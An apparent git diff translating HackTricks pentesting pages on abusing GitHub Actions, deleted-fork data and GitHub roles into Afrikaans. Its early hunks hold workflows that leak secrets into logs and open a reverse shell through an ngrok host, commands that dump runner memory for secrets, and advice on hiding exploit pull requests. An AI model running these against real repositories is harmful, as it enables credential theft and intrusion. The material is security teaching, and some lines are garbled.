-List secrets in Github Action output - +Lys geheime in Github Action-uitvoer ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- '**' +push: # Run it when a push is made to a branch +branches: +- '**' jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +Kry omgekeerde skulp met geheime ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. - - ```bash - cat /home/runner/work/_temp/* - ``` -- For a JavaScript actions the secrets and sent through environment variables - - ```bash - ps axe | grep node - ``` -- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: +- As die geheim **direk in 'n uitdrukking** gebruik word, word die gegenereerde shell-skrip **op-disk** gestoor en is dit toeganklik. +- ```bash +cat /home/runner/work/_temp/* +``` +- Vir 'n JavaScript aksies word die geheime deur omgewing veranderlikes gestuur. +- ```bash +ps axe | grep node +``` +- Vir 'n **aangepaste aksie** kan die risiko verskil, afhangende van hoe 'n program die geheim wat dit van die **argument** verkry het, gebruik: - ```yaml - uses: fakeaction/publish@v3 - with: - key: ${{ secrets.PUBLISH_KEY }} - ``` +```yaml +uses: fakeaction/publish@v3 +with: +key: ${{ secrets.PUBLISH_KEY }} +``` -### Abusing Self-hosted runners +### Misbruik van Self-gehoste lopers -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. +Die manier om te vind watter **Github Actions in nie-github infrastruktuur** uitgevoer word, is om te soek na **`runs-on: self-hosted`** in die Github Action konfigurasie yaml. -**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one. 
- -In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory: +**Self-gehoste** lopers mag toegang hĂȘ tot **ekstra sensitiewe inligting**, na ander **netwerkstelsels** (kwetsbare eindpunte in die netwerk? metadata diens?) of, selfs al is dit geĂŻsoleer en vernietig, kan **meer as een aksie gelyktydig uitgevoer word** en die kwaadwillige een kan die **geheime** van die ander steel. +In self-gehoste lopers is dit ook moontlik om die **geheime van die \_Runner.Listener**\_\*\* proses\*\* te verkry wat al die geheime van die werksvloei op enige stap sal bevat deur sy geheue te dump: ```bash sudo apt-get install -y gdb sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')" ``` +Kontroleer [**hierdie pos vir meer inligting**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). -Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). +### Github Docker Beeld Registrasie -### Github Docker Images Registry - -It's possible to make Github actions that will **build and store a Docker image inside Github**.\ -An example can be find in the following expandable: +Dit is moontlik om Github aksies te maak wat **'n Docker beeld binne Github bou en stoor**.\ +'n Voorbeeld kan gevind word in die volgende uitbreidbare:
-Github Action Build & Push Docker Image - +Github Aksie Bou & Stoot Docker Beeld ```yaml [...] - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v1 +uses: docker/setup-buildx-action@v1 - name: Login to GitHub Container Registry - uses: docker/login-action@v1 - with: - registry: ghcr.io - username: ${{ github.repository_owner }} - password: ${{ secrets.ACTIONS_TOKEN }} +uses: docker/login-action@v1 +with: +registry: ghcr.io +username: ${{ github.repository_owner }} +password: ${{ secrets.ACTIONS_TOKEN }} - name: Add Github Token to Dockerfile to be able to download code - run: | - sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile +run: | +sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile - name: Build and push - uses: docker/build-push-action@v2 - with: - context: . - push: true - tags: | - ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest - ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }} +uses: docker/build-push-action@v2 +with: +context: . +push: true +tags: | +ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest +ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }} [...] ``` -
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**. - -A user with read permissions over the repo will then be able to download the Docker Image using a personal access token: +Soos jy in die vorige kode kon sien, is die Github registrasie gehos in **`ghcr.io`**. +'n Gebruiker met leesregte oor die repo sal dan in staat wees om die Docker Image af te laai met 'n persoonlike toegangsteken: ```bash echo $gh_token | docker login ghcr.io -u --password-stdin docker pull ghcr.io//: ``` - Then, the user could search for **leaked secrets in the Docker image layers:** {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics {{#endref}} -### Sensitive info in Github Actions logs +### Sensitiewe inligting in Github Actions logs -Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret). +Selfs al probeer **Github** om **geheime waardes** in die aksies logs te **detecteer** en **te vermy om** hulle te wys, sal **ander sensitiewe data** wat in die uitvoering van die aksie gegenereer kon gewees het, nie versteek wees nie. Byvoorbeeld, 'n JWT wat met 'n geheime waarde onderteken is, sal nie versteek wees nie tensy dit [spesifiek gekonfigureer](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret) is. -## Covering your Tracks +## Bedek jou Spore -(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. 
In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR) +(Techniek van [**hier**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Eerstens, enige PR wat ingedien word, is duidelik sigbaar vir die publiek in Github en vir die teiken GitHub rekening. In GitHub kan ons **nie 'n PR van die internet verwyder** nie, maar daar is 'n draai. Vir GitHub rekeninge wat **gesuspend** is deur Github, word al hul **PRs outomaties verwyder** en van die internet verwyder. So om jou aktiwiteit te verberg, moet jy jou **GitHub rekening gesuspend kry of jou rekening geflag** kry. Dit sal **al jou aktiwiteite** op GitHub van die internet verberg (basies al jou eksploit PR verwyder) -An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github. +'n Organisasie in GitHub is baie proaktief in die verslagdoening van rekeninge aan GitHub. Al wat jy moet doen is om “n paar goed” in 'n Issue te deel en hulle sal seker maak jou rekening word binne 12 uur gesuspend :p en daar het jy, jou eksploit onsigbaar gemaak op github. > [!WARNING] -> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. +> Die enigste manier vir 'n organisasie om uit te vind dat hulle geteiken is, is om GitHub logs van SIEM te kontroleer, aangesien die PR van die GitHub UI verwyder sal word. 
-## Tools +## Gereedskap -The following tools are useful to find Github Action workflows and even find vulnerable ones: +Die volgende gereedskap is nuttig om Github Action workflows te vind en selfs kwesbare te vind: - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) @@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md index ae156de2d..108ec544e 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md @@ -1,6 +1 @@ -# Gh Actions - Artifact Poisoning - - - - - +# Gh Actions - Artefakbesmetting diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md index 024aa5ff8..f77c0d2d3 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md @@ -1,6 +1 @@ # GH Actions - Cache Poisoning - - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index 3cd632bd0..9cef507bc 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md 
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -1,6 +1 @@ # Gh Actions - Context Script Injections - - - - - diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md index f19fa699e..83ab208ec 100644 --- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md +++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md 
@@ -1,60 +1,56 @@ -# Accessible Deleted Data in Github +# Toeganklike Verwyderde Gegewens in Github {{#include ../../banners/hacktricks-training.md}} -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). +Hierdie maniere om toegang te verkry tot data van Github wat veronderstel is om verwyder te wees, is [**in hierdie blogpos gerapporteer**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). -## Accessing Deleted Fork Data +## Toegang tot Verwyderde Fork Gegewens -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork +1. Jy fork 'n openbare repository +2. Jy commit kode na jou fork +3. Jy verwyder jou fork > [!CAUTION] -> The data commited in the deleted fork is still accessible. +> Die data wat in die verwyderde fork gecommit is, is steeds toeganklik. -## Accessing Deleted Repo Data +## Toegang tot Verwyderde Repo Gegewens -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. +1. Jy het 'n openbare repo op GitHub. +2. 'n Gebruiker fork jou repo. +3. Jy commit data nadat hulle dit gefork het (en hulle sink nooit hul fork met jou opdaterings nie). +4. Jy verwyder die hele repo. > [!CAUTION] -> Even if you deleted your repo, all the changes made to it are still accessible through the forks. +> Selfs al het jy jou repo verwyder, is al die veranderinge wat aan dit gemaak is steeds toeganklik deur die forks. -## Accessing Private Repo Data +## Toegang tot Privaat Repo Gegewens -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. 
You make your “upstream” repository public and keep your fork private. +1. Jy skep 'n privaat repo wat uiteindelik openbaar gemaak sal word. +2. Jy skep 'n privaat, interne weergawe van daardie repo (deur te fork) en commit addisionele kode vir funksies wat jy nie openbaar gaan maak nie. +3. Jy maak jou “upstream” repository openbaar en hou jou fork privaat. > [!CAUTION] -> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. +> Dit is moontlik om al die data wat na die interne fork gepush is, te bekom in die tyd tussen die interne fork geskep is en die openbare weergawe openbaar gemaak is. -## How to discover commits from deleted/hidden forks +## Hoe om commits van verwyderde/verborgene forks te ontdek -The same blog post propose 2 options: +Die dieselfde blogpos stel 2 opsies voor: -### Directly accessing the commit +### Direk toegang tot die commit -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` +As die commit ID (sha-1) waarde bekend is, is dit moontlik om dit te bekom in `https://github.com///commit/` -### Brute-forcing short SHA-1 values +### Brute-forcing kort SHA-1 waardes -It's the same to access both of these: +Dit is dieselfde om toegang tot albei van hierdie te verkry: - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) -And the latest one use a short sha-1 that is bruteforceable. +En die laaste een gebruik 'n kort sha-1 wat bruteforceable is. 
-## References +## Verwysings - [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md index ae1365a0f..bdf943045 100644 --- a/src/pentesting-ci-cd/github-security/basic-github-information.md +++ b/src/pentesting-ci-cd/github-security/basic-github-information.md 
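Review bot: In the accessible-deleted-data-in-github.md hunk the commit URL template `https://github.com///commit/` has lost its owner, repository and commit-SHA placeholders on both the removed and the added line, so "is dit moontlik om dit te bekom in `https://github.com///commit/`" no longer tells the reader what to fill in; restore the three placeholders while this line is being touched. Translation nits in the same hunk: "Die dieselfde blogpos" should be "Dieselfde blogpos", "verborgene forks" should be "verborge forks", and "bruteforceable" is left in English inside an otherwise Afrikaans sentence ("wat met brute force geraai kan word" or similar). The `> [!CAUTION]` blocks and the two example commit links are carried over intact.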
@@ -1,202 +1,196 @@ -# Basic Github Information +# Basiese Github Inligting {{#include ../../banners/hacktricks-training.md}} -## Basic Structure +## Basiese Struktuur -The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. +Die basiese github omgewingstruktuur van 'n groot **maatskappy** is om 'n **onderneming** te besit wat **verskeie organisasies** besit en elkeen van hulle kan **verskeie repositories** en **verskeie span** bevat. Klein maatskappye mag net **een organisasie en geen ondernemings** besit nie. -From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. +Vanuit 'n gebruiker se perspektief kan 'n **gebruiker** 'n **lid** van **verskillende ondernemings en organisasies** wees. Binne hulle kan die gebruiker **verskillende onderneming, organisasie en repository rolle** hĂȘ. -Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. +Boonop kan 'n gebruiker **deel wees van verskillende spanne** met verskillende onderneming, organisasie of repository rolle. -And finally **repositories may have special protection mechanisms**. +En uiteindelik kan **repositories spesiale beskermingsmeganismes** hĂȘ. ## Privileges -### Enterprise Roles +### Onderneming Rolle -- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. 
However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository -- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. +- **Ondernemingseienaar**: Mense met hierdie rol kan **administrateurs bestuur, organisasies binne die onderneming bestuur, onderneminginstellings bestuur, beleid afdwing oor organisasies**. Hulle **kan egter nie toegang tot organisasie-instellings of inhoud** verkry tensy hulle 'n organisasie-eienaar gemaak word of direkte toegang tot 'n organisasie-besit repository gegee word nie. +- **Ondernemingslede**: Lede van organisasies wat deur jou onderneming besit word, is ook **outomaties lede van die onderneming**. -### Organization Roles +### Organisasie Rolle -In an organisation users can have different roles: +In 'n organisasie kan gebruikers verskillende rolle hĂȘ: -- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. -- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. -- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. -- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. 
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. -- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. +- **Organisasie-eienaars**: Organisasie-eienaars het **volledige administratiewe toegang tot jou organisasie**. Hierdie rol moet beperk word, maar nie tot minder as twee mense in jou organisasie nie. +- **Organisasie lede**: Die **standaard**, nie-administratiewe rol vir **mense in 'n organisasie** is die organisasielid. Standaard het organisasielede **'n aantal toestemmings**. +- **Faktuurbestuurders**: Faktuurbestuurders is gebruikers wat **die faktuurinstellings vir jou organisasie kan bestuur**, soos betalingsinligting. +- **Sekuriteitsbestuurders**: Dit is 'n rol wat organisasie-eienaars aan enige span in 'n organisasie kan toewys. Wanneer toegepas, gee dit elke lid van die span toestemming om **sekuriteitswaarskuwings en instellings oor jou organisasie te bestuur, sowel as leestoestemmings vir alle repositories** in die organisasie. +- As jou organisasie 'n sekuriteitspan het, kan jy die sekuriteitsbestuurderrol gebruik om lede van die span die minste toegang te gee wat hulle nodig het tot die organisasie. +- **Github App bestuurders**: Om addisionele gebruikers toe te laat om **GitHub Apps wat deur 'n organisasie besit word te bestuur**, kan 'n eienaar hulle GitHub App bestuurder toestemmings gee. +- **Buite samewerkers**: 'n Buite samewerker is 'n persoon wat **toegang het tot een of meer organisasie repositories maar nie eksplisiet 'n lid** van die organisasie is nie. 
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) +Jy kan **die toestemmings** van hierdie rolle in hierdie tabel vergelyk: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) -### Members Privileges +### Lede Privileges -In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**. +In _https://github.com/organizations/\/settings/member_privileges_ kan jy die **toestemmings wat gebruikers sal hĂȘ net omdat hulle deel van die organisasie is** sien. -The settings here configured will indicate the following permissions of members of the organisation: +Die instellings hier geconfigureer sal die volgende toestemmings van lede van die organisasie aandui: -- Be admin, writer, reader or no permission over all the organisation repos. -- If members can create private, internal or public repositories. -- If forking of repositories is possible -- If it's possible to invite outside collaborators -- If public or private sites can be published -- The permissions admins has over the repositories -- If members can create new teams +- Wees admin, skrywer, leser of geen toestemming oor al die organisasie repos. +- Of lede privaat, interne of openbare repositories kan skep. +- Of fork van repositories moontlik is. +- Of dit moontlik is om buite samewerkers uit te nooi. 
+- Of openbare of private webwerwe gepubliseer kan word. +- Die toestemmings wat administrateurs oor die repositories het. +- Of lede nuwe spanne kan skep. -### Repository Roles +### Repository Rolle -By default repository roles are created: +Standaard word repository rolle geskep: -- **Read**: Recommended for **non-code contributors** who want to view or discuss your project -- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -- **Write**: Recommended for contributors who **actively push to your project** -- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository +- **Lees**: Aanbeveel vir **nie-kode bydraers** wat jou projek wil besigtig of bespreek. +- **Triage**: Aanbeveel vir **bydraers wat proaktief probleme en pull requests moet bestuur** sonder skryftoegang. +- **Skryf**: Aanbeveel vir bydraers wat **aktief na jou projek stoot**. +- **Onderhou**: Aanbeveel vir **projekbestuurders wat die repository moet bestuur** sonder toegang tot sensitiewe of vernietigende aksies. +- **Admin**: Aanbeveel vir mense wat **volledige toegang tot die projek** benodig, insluitend sensitiewe en vernietigende aksies soos om sekuriteit te bestuur of 'n repository te verwyder. 
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) +Jy kan **die toestemmings** van elke rol in hierdie tabel vergelyk [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ +Jy kan ook **jou eie rolle skep** in _https://github.com/organizations/\/settings/roles_ -### Teams +### Spanne -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. +Jy kan **die spanne wat in 'n organisasie geskep is lys** in _https://github.com/orgs/\/teams_. Let daarop dat jy toegang tot die spanne wat kinders van ander spanne is, moet hĂȘ deur elke ouer span te benader. -### Users +### Gebruikers -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ +Die gebruikers van 'n organisasie kan **gelys** word in _https://github.com/orgs/\/people._ -In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. +In die inligting van elke gebruiker kan jy die **spanne waarvan die gebruiker 'n lid is**, en die **repos waartoe die gebruiker toegang het** sien. -## Github Authentication +## Github Verifikasie -Github offers different ways to authenticate to your account and perform actions on your behalf. 
+Github bied verskillende maniere om jou rekening te verifieer en aksies namens jou uit te voer. -### Web Access +### Webtoegang -Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). +Deur **github.com** te benader, kan jy aanmeld met jou **gebruikersnaam en wagwoord** (en 'n **2FA moontlik**). -### **SSH Keys** +### **SSH Sleutels** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) +Jy kan jou rekening met een of verskeie publieke sleutels konfigureer wat die verwante **private sleutel toelaat om aksies namens jou uit te voer.** [https://github.com/settings/keys](https://github.com/settings/keys) -#### **GPG Keys** +#### **GPG Sleutels** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). +Jy **kan nie die gebruiker met hierdie sleutels naboots nie**, maar as jy dit nie gebruik nie, kan dit moontlik wees dat jy **ontdek word vir die stuur van verbintenisse sonder 'n handtekening**. Leer meer oor [waaksaamheidsmodus hier](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). -### **Personal Access Tokens** +### **Persoonlike Toegangstokens** -You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. 
[https://github.com/settings/tokens](https://github.com/settings/tokens) +Jy kan 'n persoonlike toegangstoken genereer om **'n toepassing toegang tot jou rekening te gee**. Wanneer jy 'n persoonlike toegangstoken skep, moet die **gebruiker** die **toestemmings** spesifiseer wat die **token** sal hĂȘ. [https://github.com/settings/tokens](https://github.com/settings/tokens) -### Oauth Applications +### Oauth Toepassings -Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. +Oauth toepassings mag jou om toestemmings **te vra om 'n deel van jou github inligting te bekom of om jou na te boots** om sekere aksies uit te voer. 'n Algemene voorbeeld van hierdie funksionaliteit is die **aanmeld met github knoppie** wat jy dalk in sommige platforms vind. -- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_ +- Jy kan **jou eie** **Oauth toepassings** in [https://github.com/settings/developers](https://github.com/settings/developers) skep. +- Jy kan al die **Oauth toepassings wat toegang tot jou rekening het** in [https://github.com/settings/applications](https://github.com/settings/applications) sien. 
+- Jy kan die **skoppe wat Oauth Apps kan vra** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) sien. +- Jy kan derdeparty toegang van toepassings in 'n **organisasie** in _https://github.com/organizations/\/settings/oauth_application_policy_ sien. -Some **security recommendations**: +Sommige **sekuriteitsaanbevelings**: -- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. -- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. -- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). +- 'n **OAuth App** moet altyd **optree as die geverifieerde GitHub gebruiker oor die hele GitHub** (byvoorbeeld, wanneer gebruikerskennisgewings verskaf word) en met toegang slegs tot die gespesifiseerde skoppe. +- 'n OAuth App kan as 'n identiteitsverskaffer gebruik word deur 'n "Aanmeld met GitHub" vir die geverifieerde gebruiker in te skakel. +- **Moet nie** 'n **OAuth App** bou as jy wil hĂȘ jou toepassing moet op 'n **enkele repository** optree nie. Met die `repo` OAuth skop, kan OAuth Apps **optree op \_alle**\_\*\* van die geverifieerde gebruiker se repositories\*\*. 
+- **Moet nie** 'n OAuth App bou om as 'n toepassing vir jou **span of maatskappy** op te tree nie. OAuth Apps verifieer as 'n **enkele gebruiker**, so as een persoon 'n OAuth App vir 'n maatskappy skep om te gebruik, en dan verlaat hulle die maatskappy, sal niemand anders toegang daartoe hĂȘ nie. +- **Meer** in [hier](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). -### Github Applications +### Github Toepassings -Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. +Github toepassings kan om toestemmings vra om **toegang tot jou github inligting te verkry of om jou na te boots** om spesifieke aksies oor spesifieke hulpbronne uit te voer. In Github Apps moet jy die repositories spesifiseer waartoe die app toegang sal hĂȘ. -- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. -- The GitHub App should **connect to a personal account or an organisation**. -- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ +- Om 'n GitHub App te installeer, moet jy 'n **organisasie-eienaar wees of admin toestemmings** in 'n repository hĂȘ. 
